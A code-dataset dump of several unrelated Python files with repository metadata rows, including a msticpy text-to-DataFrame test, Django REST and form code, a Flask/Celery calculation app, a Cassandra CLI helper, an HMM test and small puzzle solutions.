>>> getOutline(raw) == {'README.md':['readme',
... 'readme/aaa',
... 'readme/bbb',
... 'readme/bbb/ccc',
... 'readme/ddd',
... 'readme/ddd/eee',
... 'readme/ddd/fff'],
... 'quickstart.md': ['quickstart',
... 'quickstart/step-1',
... 'quickstart/step-2',
... 'quickstart/step-3']}
True
'''
text = []
for e in i:
text += extractOutline(e)
filenames = {}
stack = {}
for line in text:
if line.strip() != '':
n = len(line)-len(line.lstrip())
line = line.strip()
assert(n%2 == 0)
if n == 0:
line,f = line.split(' ')
line = line.strip(':')
filenames[f] = []
stack[n] = line
stack = {k:v for k,v in stack.items() if k <= n}
path = '/'.join([stack[k] for k in sorted(stack.keys())])
filenames[f] += [path]
return filenames
| UTF-8 | Python | false | false | 3,148 | py | 19 | outline.py | 14 | 0.435197 | 0.431385 | 0 | 120 | 25.225 | 95 |
RiskIQ/msticpy | 10,488,310,144,212 | 6e074d0ba4b9b69fdaae8da88c6bbd6723070bd4 | 373cd41477438cc8826cd2a2f8689be84f486339 | /tests/datamodel/test_txt_df_magic.py | baf52606e5003c930809ff733806e64c924c83ef | [
"LicenseRef-scancode-generic-cla",
"LGPL-3.0-only",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"ISC",
"LGPL-2.0-or-later",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"LGPL-2.1-only",
"Unlicense",
"Python-2.0",
"LicenseRef-scancode-python-cwi",
"MIT",
"LGPL-2.1-or-later",
"GPL-2.0-or-later",
"HPND",
"ODbL-1.0",
"GPL-1.0-or-later",
"MPL-2.0"
] | permissive | https://github.com/RiskIQ/msticpy | cd42d601144299ec43631554076cc52cbb42dc98 | 44b1a390510f9be2772ec62cb95d0fc67dfc234b | refs/heads/master | 2023-08-27T00:11:30.098917 | 2021-06-17T22:54:29 | 2021-06-17T22:54:29 | 374,787,165 | 1 | 0 | MIT | true | 2021-09-16T19:05:43 | 2021-06-07T20:05:09 | 2021-07-29T16:04:07 | 2021-09-16T19:05:41 | 23,582 | 1 | 0 | 0 | Python | false | false | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Test Text to DF magic."""
import pandas as pd
import pytest_check as check
from msticpy.datamodel.pivot_magic_core import run_txt2df
__author__ = "Ian Hellen"
# pylint: disable=redefined-outer-name
_INPUT_TEST = """
file, lines1, lines2, lines3, percent
msticpy___init__.py, 24, 12, 0, 50%
msticpy__version.py, 1, 0, 0, 100%
msticpy_analysis___init__.py, 3, 0, 0, 100%
msticpy_analysis_anomalous_sequence___init__.py, 3, 0, 0, 100%
msticpy_analysis_anomalous_sequence_anomalous.py, 34, 26, 0, 24%
msticpy_analysis_anomalous_sequence_model.py, 222, 196, 0, 12%
msticpy_analysis_anomalous_sequence_sessionize.py, 59, 52, 0, 12%
msticpy_analysis_anomalous_sequence_utils___init__.py, 3, 0, 0, 100%
msticpy_analysis_anomalous_sequence_utils_cmds_only.py, 76, 63, 0, 17%
msticpy_analysis_anomalous_sequence_utils_cmds_params_only.py, 105, 91, 0, 13%
msticpy_analysis_anomalous_sequence_utils_cmds_params_values.py, 126, 111, 0, 12%
msticpy_analysis_anomalous_sequence_utils_data_structures.py, 27, 16, 0, 41%
msticpy_analysis_anomalous_sequence_utils_laplace_smooth.py, 34, 28, 0, 18%
msticpy_analysis_anomalous_sequence_utils_probabilities.py, 42, 35, 0, 17%
"""
# Magic args
# "--sep",
# "--name",
# "--headers",
# "--keepna",
def test_txt2df():
"""Test txt2df magic function."""
res_df = run_txt2df(line="", cell=_INPUT_TEST, local_ns=None)
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (15, 5))
# headers
res_df = run_txt2df(line="--headers", cell=_INPUT_TEST, local_ns=None)
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (14, 5))
for col in _INPUT_TEST.split("\n")[1].split(","):
check.is_in(col.strip(), list(res_df.columns))
# separator
res_df = run_txt2df(
line="--headers --sep=\t", cell=_INPUT_TEST.replace(",", "\t"), local_ns=None
)
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (14, 5))
# some malformed lines
cell_input = []
for idx, line in enumerate(_INPUT_TEST.split("\n")):
if line and idx % 5 != 3:
cell_input.append(line + ",")
else:
cell_input.append(line)
res_df = run_txt2df(line="--headers", cell="\n".join(cell_input), local_ns=None)
# expect output with dropped columns
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (14, 5))
res_df = run_txt2df(
line="--headers --keepna", cell="\n".join(cell_input), local_ns=None
)
# expect output with no dropped columns
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (14, 6))
# add extra delimiters for 2 empty columns
cell_input = [line + ", ," for line in _INPUT_TEST.split("\n") if line]
res_df = run_txt2df(
line="--headers --keepna", cell="\n".join(cell_input), local_ns=None
)
# expect output with cols following header row
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (14, 7))
for col in ("Unnamed: 5", "Unnamed: 6"):
check.is_in(col.strip(), list(res_df.columns))
# keepna should force blank columns to remain
res_df = run_txt2df(line="--keepna", cell="\n".join(cell_input), local_ns=None)
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (15, 7))
# name
namespace = {}
res_df = run_txt2df(
line="--headers --name=my_df", cell=_INPUT_TEST, local_ns=namespace
)
check.is_instance(res_df, pd.DataFrame)
check.equal(res_df.shape, (14, 5))
check.is_in("my_df", namespace)
check.is_instance(namespace["my_df"], pd.DataFrame)
check.equal(namespace["my_df"].shape, (14, 5))
| UTF-8 | Python | false | false | 3,973 | py | 374 | test_txt_df_magic.py | 244 | 0.627234 | 0.590486 | 0 | 105 | 36.838095 | 85 |
dillan08/PAT | 781,684,062,325 | 08e87b9bdd29e7d1b764f9b07d92253075c6a074 | 5528290429e3e98be841dc8a8ea504aa657f0187 | /interesesCRUD/views.py | e8c553c895fefe3dd57a29fd08f1766b37a34d77 | [] | no_license | https://github.com/dillan08/PAT | ac8973c2ccd9efbd8692bce4173dfc3e307e5a5a | 39a75bc2a29bcaf7457c886989f291623dcd465d | refs/heads/development | 2020-09-15T01:44:55.021752 | 2016-10-21T13:29:08 | 2016-10-21T13:29:08 | 67,364,883 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework import status
from interesesCRUD.serializer import InteresSerializer
from nucleo.models import Interes
# Create your views here.
class InteresVS(viewsets.ModelViewSet):
serializer_class = InteresSerializer
queryset = Interes.objects.all()
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
| UTF-8 | Python | false | false | 701 | py | 37 | views.py | 36 | 0.758916 | 0.754636 | 0 | 19 | 35.842105 | 89 |
cccgp/Machine-Learning-Algorithms | 7,206,955,150,475 | 5f190bacf4f98973372152479e50f67ffa0e52eb | 105683b026cee117aa6d684b7450b3bb0d83094e | /hmm/tests/test_hmm.py | 41b174adbc4152748a5e2ef878a1ad9b1679cffa | [] | no_license | https://github.com/cccgp/Machine-Learning-Algorithms | 72debf53e89f4223ff45ebd3ca68587e39632d1e | ea1768ffc23f9ffb2d46172eb12c036f28ee09e6 | refs/heads/master | 2020-04-24T18:03:42.579276 | 2019-02-28T03:18:02 | 2019-02-28T03:18:02 | 172,168,321 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from hmm.hmm import Hmm
import time
def test_hmm():
A = np.array([[0.5, 0.2, 0.3], [0.3, 0.5, 0.2], [0.2, 0.3, 0.5]])
B = np.array([[0.5, 0.5], [0.4, 0.6], [0.7, 0.3]])
PI = np.array([0.2, 0.4, 0.4])
O = np.array([0, 1, 0])
model = Hmm()
model.forward(A, B, PI, O)
model.vibiter(A, B, PI, O)
if __name__ == '__main__':
start = time.time()
test_hmm()
end = time.time()
| UTF-8 | Python | false | false | 452 | py | 17 | test_hmm.py | 16 | 0.462389 | 0.376106 | 0 | 20 | 20.6 | 69 |
Sergey-Laznenko/Stepik | 6,880,537,646,653 | c7c6b0dedae60d9d54c88dc2bd58a64d326b0447 | f7463bd0ab18b41611d5ac725f65d3db3a3a7a1d | /Generation Python - A Beginner's Course/13_Functions/13.4(return)/6.py | 935283dad1bd12b2d645cfb70defe4c8b60e6d5c | [] | no_license | https://github.com/Sergey-Laznenko/Stepik | f81c5aeead3fbd20628129d60ccce92b34724b97 | 5e1a1a76c3f6ed487cf8fc847913c890c8eac840 | refs/heads/master | 2022-12-28T19:01:48.670540 | 2020-10-18T15:23:58 | 2020-10-18T15:23:58 | 279,022,462 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Напишите функцию convert_to_miles(km), которая принимает в качестве аргумента расстояние в километрах
и возвращает расстояние в милях.
"""
def convert_to_miles(km):
return km * 0.6214
num = int(input())
print(convert_to_miles(num))
| UTF-8 | Python | false | false | 341 | py | 299 | 6.py | 298 | 0.729508 | 0.709016 | 0 | 12 | 19.333333 | 101 |
rnlascano/PyMonitorMQTT | 2,473,901,179,691 | 33f9b7682705b5204739d6236b545afc16525e48 | b74c7f4cb3a460566e43b476e19b080eb93cc85f | /Sensors/RamSensor/RamSensor.py | ec07b9e9756583e4bb3ed1e1daee7fa47954a560 | [] | no_license | https://github.com/rnlascano/PyMonitorMQTT | 37e87fe7748ef0476b5c425ea50f5169adcfe578 | c991a130bec808c16a0c02959cce379e3adef6fb | refs/heads/master | 2022-12-05T01:18:24.762188 | 2020-08-31T19:50:46 | 2020-08-31T19:50:46 | 291,809,554 | 0 | 0 | null | true | 2020-08-31T19:50:47 | 2020-08-31T19:46:04 | 2020-08-31T19:46:06 | 2020-08-31T19:50:46 | 817 | 0 | 0 | 0 | null | false | false | import psutil
from Sensors.Sensor import Sensor
TOPIC_RAM_PERCENTAGE = 'ram_used_percentage'
class RamSensor(Sensor):
def Initialize(self):
self.AddTopic(TOPIC_RAM_PERCENTAGE)
def Update(self):
self.SetTopicValue(TOPIC_RAM_PERCENTAGE, self.GetSystemRam())
def GetSystemRam(self):
return psutil.virtual_memory()[2]
| UTF-8 | Python | false | false | 356 | py | 15 | RamSensor.py | 13 | 0.707865 | 0.705056 | 0 | 16 | 21.25 | 69 |
extreme-developers/ShoppingOnline | 6,176,163,013,801 | 02685eea4e054c6dd198f6cb3e56eb851c0da1c7 | 356bbc95f450735840b5be1fffabc67d300f607a | /apps/mobiles/migrations/0005_typicalspecification_wifi.py | 80b24616892e319a81710a0a5c55d4c6ed11bafb | [] | no_license | https://github.com/extreme-developers/ShoppingOnline | fb78be9ccd998e06143a890bbd68ba09b23c12f9 | d4606315f1c2ee29e30a1cb47ee5dac3a3d640ac | refs/heads/master | 2020-06-10T01:33:58.642777 | 2018-03-08T12:51:00 | 2018-03-08T12:57:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-10-17 09:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mobiles', '0004_auto_20171017_0843'),
]
operations = [
migrations.AddField(
model_name='typicalspecification',
name='wifi',
field=models.IntegerField(choices=[(1, '支持'), (2, '不支持')], default=1, verbose_name='WIFI'),
),
]
| UTF-8 | Python | false | false | 523 | py | 138 | 0005_typicalspecification_wifi.py | 92 | 0.596491 | 0.528265 | 0 | 20 | 24.65 | 103 |
yiziqi/vega | 249,108,142,850 | 5f4b681f5556dc4ae36768d60652d48500413922 | 6bd21a64c5fbeba1682c3e65221f6275a44c4cd5 | /vega/networks/__init__.py | 9059f749e06ac4778ff9da8bcc68db5b581fcf33 | [
"MIT"
] | permissive | https://github.com/yiziqi/vega | e68935475aa207f788c849e26c1e86db23a8a39b | 52b53582fe7df95d7aacc8425013fd18645d079f | refs/heads/master | 2023-08-28T20:29:16.393685 | 2021-11-18T07:28:22 | 2021-11-18T07:28:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Import and register network automatically."""
from vega.common.class_factory import ClassFactory
from .network_desc import NetworkDesc
ClassFactory.lazy_register("vega.networks", {
"adelaide": ["AdelaideFastNAS"],
"bert": ["BertClassification", "TinyBertForPreTraining", "BertClassificationHeader"],
"dnet": ["DNet", "DNetBackbone", "EncodedBlock"],
"erdb_esr": ["ESRN"],
"faster_backbone": ["FasterBackbone"],
"faster_rcnn": ["FasterRCNN"],
"mobilenet": ["MobileNetV3Tiny", "MobileNetV2Tiny"],
"mobilenetv3": ["MobileNetV3Small", "MobileNetV3Large"],
"necks": ["FPN"],
"quant": ["Quantizer"],
"resnet_det": ["ResNetDet"],
"resnet_general": ["ResNetGeneral"],
"resnet": ["ResNet"],
"resnext_det": ["ResNeXtDet"],
"sgas_network": ["SGASNetwork"],
"simple_cnn": ["SimpleCnn"],
"spnet_backbone": ["SpResNetDet"],
"super_network": ["DartsNetwork", "CARSDartsNetwork", "GDASDartsNetwork"],
"text_cnn": ["TextCells", "TextCNN"],
"gcn": ["GCN"],
"vit": ["VisionTransformer"],
"mtm_sr": ["MtMSR"],
"unet": ["Unet"]
})
def register_networks(backend):
"""Import and register network automatically."""
if backend == "pytorch":
from . import pytorch
elif backend == "tensorflow":
from . import tensorflow
elif backend == "mindspore":
from . import mindspore
| UTF-8 | Python | false | false | 1,821 | py | 217 | __init__.py | 197 | 0.660077 | 0.654585 | 0 | 50 | 35.42 | 89 |
harrylee0810/TIL-c9 | 6,107,443,514,638 | 9fb23a2fe750fdd680bfe31d8f9f1ed0d81858cf | bb193c259e7efd696921496b92ec45dfdf3fe5a1 | /django/auth/posts/admin.py | 014a0dc9c082b3bd771df69a635927566165c6c7 | [] | no_license | https://github.com/harrylee0810/TIL-c9 | 6f6526ac03690d29fb278f5c7903f90c254a510b | 4a811e20d9ae9df17cf41c33047e4c876cacc8a8 | refs/heads/master | 2020-04-17T17:18:15.261578 | 2019-02-12T08:59:29 | 2019-02-12T08:59:29 | 166,777,152 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from .models import Post, Comment
#내용도 같이 보이게 admin 페이지를 커스터마이징 할 필요 있음
class PostAdmin(admin.ModelAdmin):
list_display = ('title','content','created_at','updated_at',)
# Register your models here.
admin.site.register(Post, PostAdmin)
admin.site.register(Comment) | UTF-8 | Python | false | false | 350 | py | 14 | admin.py | 11 | 0.753289 | 0.753289 | 0 | 12 | 24.416667 | 65 |
zjulyx/LeetCodePython | 2,276,332,684,502 | 7bd8021086d7ffb64013d31d27be4850b291826c | ccb288ffd441565d6dd40de7746325d51b7722d5 | /Medium/面试题 08.14. 布尔运算.py | b0e7861d10b0e5739a33b7aab4ab89b3dfc618d4 | [] | no_license | https://github.com/zjulyx/LeetCodePython | 1dfbe765859dc90a13d2db2629bbbbd025bea94c | 8953a8f7db215df169691b411e7eba47e5ac3632 | refs/heads/master | 2020-03-26T21:53:25.716728 | 2020-03-26T10:40:04 | 2020-03-26T10:40:04 | 145,415,356 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 给定一个布尔表达式和一个期望的布尔结果 result,布尔表达式由 0 (false)、1 (true)、& (AND)、 | (OR) 和 ^ (XOR) 符号组成。实现一个函数,算出有几种可使该表达式得出 result 值的括号方法。
# 示例 1:
# 输入: s = "1^0|0|1", result = 0
# 输出: 2
# 解释: 两种可能的括号方法是
# 1^(0|(0|1))
# 1^((0|0)|1)
# 示例 2:
# 输入: s = "0&0&0&1^1|0", result = 1
# 输出: 10
# 提示:
# 运算符的数量不超过 19 个
# 通过次数65提交次数169
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/boolean-evaluation-lcci
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
class Solution:
def countEval(self, s: str, result: int) -> int:
# 分治法, cal返回当前表达式0和1的数目
# 对于每个操作符, 分别计算其左右表达式的0和1的数目, 然后根据操作符本身得到当前操作符的对应的0和1的数目
# 使用一个字典将结果保存下来加速运算
d = {}
def cal(s):
if len(s) == 1:
return (1 - int(s), int(s))
if s in d:
return d[s]
cur0, cur1 = 0, 0
for i in range(1, len(s)):
if s[i] == '&' or s[i] == '|' or s[i] == '^':
l0, l1 = cal(s[0:i])
r0, r1 = cal(s[i + 1:])
if s[i] == '&':
cur0 += l0 * r0 + l0 * r1 + l1 * r0
cur1 += l1 * r1
elif s[i] == '|':
cur0 += l0 * r0
cur1 += l1 * r1 + l0 * r1 + l1 * r0
else:
cur0 += l0 * r0 + l1 * r1
cur1 += l0 * r1 + l1 * r0
d[s] = (cur0, cur1)
return d[s]
return cal(s)[result]
if __name__ == '__main__':
try:
print(Solution().countEval(s="1^0", result=0)) # or Execute()
print(Solution().countEval(s="1^0|0", result=0)) # or Execute()
print(Solution().countEval(s="1^0|0|1", result=1)) # or Execute()
print(Solution().countEval(s="0&0&0&1^1|0", result=0)) # or Execute()
except Exception as err:
print(err)
| UTF-8 | Python | false | false | 2,393 | py | 787 | 面试题 08.14. 布尔运算.py | 784 | 0.430269 | 0.37655 | 0 | 64 | 28.25 | 121 |
King-Of-Game/Python | 17,154,099,400,376 | 6a6001c98f3f8ee05081bd7e1c0074b0663510c6 | 36afa271f080459adf1014cd23f4be9f954dfee6 | /Example/date/生成日历.py | 356d0d16c377d1ae4ad432132a237cf0249658d6 | [] | no_license | https://github.com/King-Of-Game/Python | b69186a7574ce1c0b7097207cfe9a2eb38a90bc0 | 643b9fd22efd78f6679735f23432943a57b5f5bb | refs/heads/master | 2023-05-25T05:35:14.473114 | 2021-10-24T12:52:21 | 2021-10-24T12:52:21 | 151,251,434 | 3 | 0 | null | false | 2023-05-01T20:51:50 | 2018-10-02T12:34:04 | 2021-10-24T12:52:41 | 2023-05-01T20:51:50 | 90,134 | 1 | 0 | 3 | HTML | false | false | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# __author__ : YiXuan
# __date__ : 1/17/2021 1:15 PM
# __software__ : PyCharm
'''
使用内置模块:calendar 生成日历
'''
import calendar
# 生成日历
def generateCalender():
while True:
input_txt = input('***日历(输入q退出)***\n:')
if input_txt in ['q', 'Q']:
break
try:
year = int(input('请输入年份: '))
month = int(input('请输入月份: '))
# 显示日历
print(calendar.month(year, month))
except ValueError:
print('请输入合法的年份和月份!')
if __name__ == '__main__':
generateCalender()
| UTF-8 | Python | false | false | 701 | py | 250 | 生成日历.py | 213 | 0.497512 | 0.477612 | 0 | 34 | 16.735294 | 47 |
kate-melnykova/Scientific-functions | 163,208,790,147 | 6578105d74c3193e99407a39c6a97ee5a75c1cd5 | f965d7db19fb8e032fa1b7dc028522a47ba9307d | /calcs/main.py | abd5bd45206521e35f0de41ede9eeeb88f5b68b0 | [] | no_license | https://github.com/kate-melnykova/Scientific-functions | 8da976a45933ac062404ae1ef957c336388a302a | 697cedf42845efddd4d7ebc92d4237604df9014d | refs/heads/master | 2020-06-05T09:33:29.463310 | 2019-09-07T05:36:44 | 2019-09-07T05:36:44 | 192,393,110 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from time import time
from flask import Blueprint
from flask import flash
from flask import url_for
from flask import redirect
from flask import request
from flask import render_template
from flask_login import LoginManager, UserMixin, login_required,\
login_user, logout_user, current_user
import json
from redis import Redis
from factory_app import factory_app
from redispy import get_connection
from views.auth import User
from views.auth.login_form import auth
from sci_funcs.tasks import args_to_function
from sci_funcs.function_registry import function_registry
app, celery = factory_app()
######
# LoginManager setup
######
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def user_loader(username):
user_db = get_connection(db=app.config['USER_DB']).get(username)
if user_db is not None:
return User.deserialize(user_db)
else:
return None
app.register_blueprint(auth)
@app.route('/', methods=['GET'])
@app.route('/index', methods=['GET'])
def index():
print(f'Current user on index page {current_user}')
return render_template('index.html')
@app.route('/schedule_calculation', methods=['POST'])
def schedule_calculation():
assert request.method == 'POST'
func_name = request.form['func_name']
if func_name in function_registry:
arguments = dict()
arguments['func_name'] = func_name
arguments['status'] = 'IN PROGRESS'
arguments['start_time'] = time()
for item in function_registry[func_name][1:]:
arguments[item] = request.form[item]
# get task identifier
get_connection(db=app.config['CALCS_DB'])
async_result = args_to_function.delay(arguments, function_registry[func_name][1:])
message = json.dumps({"status": "PENDING",
"result": arguments,
"task_id": async_result.task_id
})
get_connection(db=app.config['CALCS_DB']).set(f'celery-task-meta-{async_result.task_id}',
message)
return redirect(url_for('view_results'))
else:
assert func_name == 'expression'
expression = request.form.expression
flash(f'Submitted {expression}')
return redirect(url_for('index'))
@app.route('/view_results', methods=['GET'])
def view_results():
results_temp = {}
connection = get_connection(db=app.config['CALCS_DB'])
for key in connection.keys('*'):
result = json.loads(connection.get(key))
task_id = result['task_id']
result = result['result']
results_temp[task_id] = result
return render_template('view_results.html',
results=results_temp)
@app.route('/result', methods=['GET'])
@login_required
def view_specific_results():
task_id = str(request.args.get('task_id', ''))
key = str.encode(f'celery-task-meta-{task_id}')
try:
result = json.loads(get_connection(db=app.config['CALCS_DB']).get(key))
except:
flash('Task not found')
return redirect(url_for('index'))
result = result['result']
return render_template(f'{ result["func_name"] }.html',
result=result)
"""
next = flask.request.args.get('next')
# is_safe_url should check if the url is safe for redirects.
# See http://flask.pocoo.org/snippets/62/ for an example.
if not is_safe_url(next):
return flask.abort(400)
return flask.redirect(next or flask.url_for('index'))
# handle login failed
@app.errorhandler(401)
def page_not_found(e):
return Response('<p>Login failed</p>')
""" | UTF-8 | Python | false | false | 3,763 | py | 23 | main.py | 12 | 0.623173 | 0.620516 | 0 | 125 | 29.112 | 97 |
zufishantaj/mycodebase | 2,259,152,830,516 | 43511dba102fa440f60d2ec79e4e14ae258f1db1 | 39fbaaa26779579ca1a6cfde95520425ae66ed89 | /Class2/second.py | ac26dd91d29f0fc2abf8f49822a93717278e1c8e | [] | no_license | https://github.com/zufishantaj/mycodebase | 02eb7d846a69bba2de1df27c068919a00c3f4d8c | 74cba0a315bd129eff86190fbf4421ba28ab9a92 | refs/heads/master | 2022-12-31T19:14:01.574948 | 2020-10-27T20:26:16 | 2020-10-27T20:26:16 | 268,316,063 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | print('Please enter your name')
x=input()
print("Hello, "+ x)
| UTF-8 | Python | false | false | 64 | py | 63 | second.py | 42 | 0.640625 | 0.640625 | 0 | 3 | 19.666667 | 31 |
tingleshao/leetcode | 704,374,681,878 | b6d9264107aaef6b00363629f1af6e7bda770158 | 02425f5fffe5f46961c3167c46302ef84c6e48a4 | /palindrome_partitioning/main.py | 0c58ebc78f553d215972a5b91fda0237e68af093 | [] | no_license | https://github.com/tingleshao/leetcode | 583718b5e58c3611f3db352d82017ba1d4482f18 | e2c589a1e81282e1c3deb6dfc5cace595acb841b | refs/heads/master | 2021-01-23T03:43:31.256959 | 2015-01-23T18:00:25 | 2015-01-23T18:00:25 | 29,308,438 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution:
# @param s, a string
# @return a list of lists of string
def partition(self, s):
result = []
output = []
self.DFS(s,0,output,result)
return result
def isPalindrome(self,s,start,end):
# print start
# print end
while start < end:
if s[start] != s[end]:
return False
start += 1
end -= 1
return True
def DFS(self, s, start, output, result):
if start == len(s):
result.append(output)
return
for i in xrange(start,len(s)):
if self.isPalindrome(s, start, i):
output.append(s[start:i+1])
# print output
self.DFS(s,i+1,list(output),result)
output.pop(-1)
def main():
s = Solution()
sti = "aab"
print s.partition(sti)
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 880 | py | 148 | main.py | 147 | 0.506818 | 0.5 | 0 | 37 | 22.810811 | 45 |
ShangSky/YangShop | 9,637,906,647,953 | ab56abe248bf279b90c3100a06cc82f5ad7a1d7f | 6a96f3ed9cdffd3548845b44931e99345d7ba231 | /FoodShop/apps/goods/admin.py | cb1b08c1a72d35974b57a5c688dda21aaabe7f41 | [] | no_license | https://github.com/ShangSky/YangShop | ffca8c4d6e8468288dd6ce3e45e740e9cdc600ef | d2a7d0c1155fd7627d8bf7427bc72e9f2ee15fe9 | refs/heads/master | 2020-06-22T12:45:11.749754 | 2020-06-06T03:17:04 | 2020-06-06T03:17:04 | 197,717,146 | 2 | 1 | null | false | 2021-04-08T19:34:38 | 2019-07-19T06:43:01 | 2020-06-06T03:17:31 | 2021-04-08T19:34:35 | 2,954 | 2 | 1 | 13 | Python | false | false | from django.contrib import admin
from .models import Goods, GoodsBanner, Category, IndexBanner
admin.site.site_header = admin.site.site_title = admin.site.index_title = '阳哥商城后台管理'
@admin.register(Goods)
class GoodsAdmin(admin.ModelAdmin):
pass
@admin.register(GoodsBanner)
class GoodsBannerAdmin(admin.ModelAdmin):
pass
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(IndexBanner)
class IndexBannerAdmin(admin.ModelAdmin):
pass
| UTF-8 | Python | false | false | 507 | py | 67 | admin.py | 43 | 0.775967 | 0.775967 | 0 | 23 | 20.304348 | 84 |
pmontu/indian_farming | 11,854,109,739,581 | 7d30e2a5dad381de4e7cf912d2ac11bad4e532b9 | c2a663f9892510c6069a23bc75710758476585b1 | /usermgmt/serializers.py | 787edacdbfc84ded032cfa0e75d014864579cd62 | [] | no_license | https://github.com/pmontu/indian_farming | 6e7f663520a8dcd162a7b654b61f86119c86da24 | bdf3270d70c9ca487d52fdba7a865830ecd31580 | refs/heads/master | 2021-01-21T05:23:04.678827 | 2017-02-27T05:44:34 | 2017-02-27T05:44:34 | 83,179,818 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.validators import UniqueValidator
from .models import CustomUser
class UserSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True)
username = serializers.CharField(validators=[UniqueValidator(queryset=User.objects.all())])
user_type = serializers.ChoiceField(
CustomUser.SPECIAL_USER_CHOICES,
source="customuser.user_type")
password = serializers.CharField(
max_length=128, write_only=True,
style={'input_type': 'password'})
is_superuser = serializers.BooleanField(read_only=True)
def create(self, validated_data):
customuser = validated_data.pop("customuser")
user = User.objects.create_user(**validated_data)
user_type = customuser["user_type"]
CustomUser.objects.create(user=user, user_type=user_type)
return user
class Meta:
model = User | UTF-8 | Python | false | false | 983 | py | 20 | serializers.py | 18 | 0.713123 | 0.710071 | 0 | 27 | 35.444444 | 95 |
verma7/dcos-cassandra-service-new | 15,513,421,897,305 | 1370135a4616813c94d1bd380fe2ab22c84b2766 | 8a421507d3f46eee694f91813dd39a403de57dd5 | /cli/dcos_cassandra/cassandra_utils.py | 9cd9aa10b675bfbfca574cd954ed0caba2cea3cd | [
"Apache-2.0"
] | permissive | https://github.com/verma7/dcos-cassandra-service-new | c3e557df8cec2583f07e1457c6aff016461d1054 | 0e02914513e191b7b78d14f2b0b2525a092363ff | refs/heads/master | 2020-04-05T00:35:26.189989 | 2016-10-05T00:32:19 | 2016-10-05T00:48:59 | 67,839,518 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# Copyright (C) 2015 Mesosphere, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from dcos import util
__fwk = None
def get_fwk_name():
return __fwk \
or util.get_config().get('cassandra.service_name') \
or "cassandra"
def set_fwk_name(name):
global __fwk
__fwk = name
def base_url():
return util.get_config().get('core.dcos_url').rstrip("/")
def marathon_url(slash_command):
return "%s/marathon/v2%s" % (base_url(), slash_command)
def api_url(slash_command):
base_config_url = util.get_config().get('cassandra.url')
if base_config_url is not None:
base_config_url = base_config_url.rstrip("/")
else:
base_config_url = "%s/service/%s" % (base_url(), get_fwk_name())
return "%s/v1%s" % (base_config_url, slash_command)
def to_json(responseObj):
# throw any underlying request error
responseObj.raise_for_status()
# return json
return responseObj.json()
def print_json(jsonObj):
print(json.dumps(jsonObj,
sort_keys=True,
indent=4,
separators=(',', ': ')))
| UTF-8 | Python | false | false | 1,641 | py | 146 | cassandra_utils.py | 127 | 0.648995 | 0.642291 | 0 | 62 | 25.467742 | 74 |
vilmarferreira/recibo_1 | 2,113,123,918,256 | 135a106ccb8e97cdb998bcf048b863a09f52d856 | e5b8d3fd12423648c9f0675d3b89b75fcd5a560b | /core/form.py | 887f5137369e4a98f4e024537b351e1ca8d6918f | [] | no_license | https://github.com/vilmarferreira/recibo_1 | 834cca4e64121f87a05ef976920ce5ffe2a36890 | 1fab47df4408609063bd40f563f1e7bc1e32c589 | refs/heads/master | 2020-04-13T17:11:22.393386 | 2018-12-27T22:26:47 | 2018-12-27T22:26:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
from dal import autocomplete
from core.models import Receipt, Person
class ReceiptForm(forms.ModelForm):
person = forms.ModelChoiceField(queryset=Person.objects.all(),widget=autocomplete.ModelSelect2(url='person-autocomplete'))
